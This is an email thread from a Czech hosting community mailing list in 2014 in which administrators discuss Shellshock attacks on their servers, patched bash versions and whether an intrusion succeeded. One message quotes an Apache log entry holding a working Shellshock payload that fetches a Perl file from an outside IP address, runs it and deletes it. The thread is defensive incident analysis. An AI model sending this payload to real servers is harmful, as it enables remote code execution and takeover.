<html><head><meta http-equiv="Content-Type" content="text/html charset=utf-8"></head><body style="word-wrap: break-word; -webkit-nbsp-mode: space; -webkit-line-break: after-white-space;"><div>Ahoj,</div><div><br></div><div>a pokud mám podle logu apt, že byl bash verze 4.2+dfsg-0.1+deb7u1 instalován 2014-09-24 16:38:33, ale v logu Apache mám záznam s HTTP kódem 200 ze dne 2014-09-27 00:33:55, tak to mám chápat jak?</div><div><br></div><div>/var/www/0ops/log/access.log:70.42.149.68 - - [27/Sep/2014:00:33:55 +0200] "GET / HTTP/1.0" <b>200</b> 643 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""<br></div><div><br></div><div>redacted</div><br><div><div>29. 9. 2014 v 10:24, Jiří Medvěd <<a href="mailto:admin@jirimedved.cz">admin@jirimedved.cz</a>>:</div><br class="Apple-interchange-newline"><blockquote type="cite"><fieldset style="padding-top:10px; border:0px; border: 3px solid #CCC; padding-left: 20px;"><legend style="font-weight:bold">Podepsáno PGP část</legend><div style="padding-left:3px;">Ahoj,<br>ma -> bash 4.1.2-15.el6_5.2 (to je posledni opravena verze).<br><br>Medved<br><br>Dne 29.9.2014 v 10:18 Jan Sedlák napsal(a):<br>> Na to mě napadá druhá hloupá otázka: Scientific Linux 6 stále nemá<br>> fixnutou verzi v repozitářích, že ne? A co s tím?<br>><br>> Honza<br>><br>> 29. 9. 2014 v 10:10, Michal Miklos <<a href="mailto:mimik@mimik.sk">mimik@mimik.sk</a>>:<br>><br>>> jedine si zistit ci mas dobru verziu bashu.<br>>><br>>><br>>>> On 29 Sep 2014, at 10:08, Jan B. Kolář<br>>>> <<a href="mailto:janbivoj.kolar@zazen-nudu.cz">janbivoj.kolar@zazen-nudu.cz</a>> wrote:<br>>>><br>>>> Ahoj,<br>>>><br>>>> možná hloupá otázka - dá se nějak z logu zjistit, zda ten<br>>>> průnik byl úspěšný či nikoliv?<br>>>><br>>>> Honza<br>>>><br>>>>> On 29.9.2014 10:02, Petr Krcmar wrote: Dne 29.9.2014 v 09:57<br>>>>> Jiří Medvěd napsal(a):<br>>>>>> Hele,<br>>>>>><br>>>>>> z jineho stroje:<br>>>>> Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit<br>>>>> rootkit:<br>>>>><br>>>>> <a href="http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/">http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/</a><br>>>><br>>>><br>>>>><br>_______________________________________________<br>>>> Community-list mailing list <a href="mailto:Community-list@lists.vpsfree.cz">Community-list@lists.vpsfree.cz</a><br>>>> <a href="http://lists.vpsfree.cz/listinfo/community-list">http://lists.vpsfree.cz/listinfo/community-list</a><br>>><br>>> _______________________________________________ Community-list<br>>> mailing list <a href="mailto:Community-list@lists.vpsfree.cz">Community-list@lists.vpsfree.cz</a><br>>> <a href="http://lists.vpsfree.cz/listinfo/community-list">http://lists.vpsfree.cz/listinfo/community-list</a><br>> _______________________________________________ Community-list<br>> mailing list <a href="mailto:Community-list@lists.vpsfree.cz">Community-list@lists.vpsfree.cz</a><br>> <a href="http://lists.vpsfree.cz/listinfo/community-list">http://lists.vpsfree.cz/listinfo/community-list</a><br>></div></fieldset><br>_______________________________________________<br>Community-list mailing list<br><a href="mailto:Community-list@lists.vpsfree.cz">Community-list@lists.vpsfree.cz</a><br>http://lists.vpsfree.cz/listinfo/community-list<br></blockquote></div><br></body></html>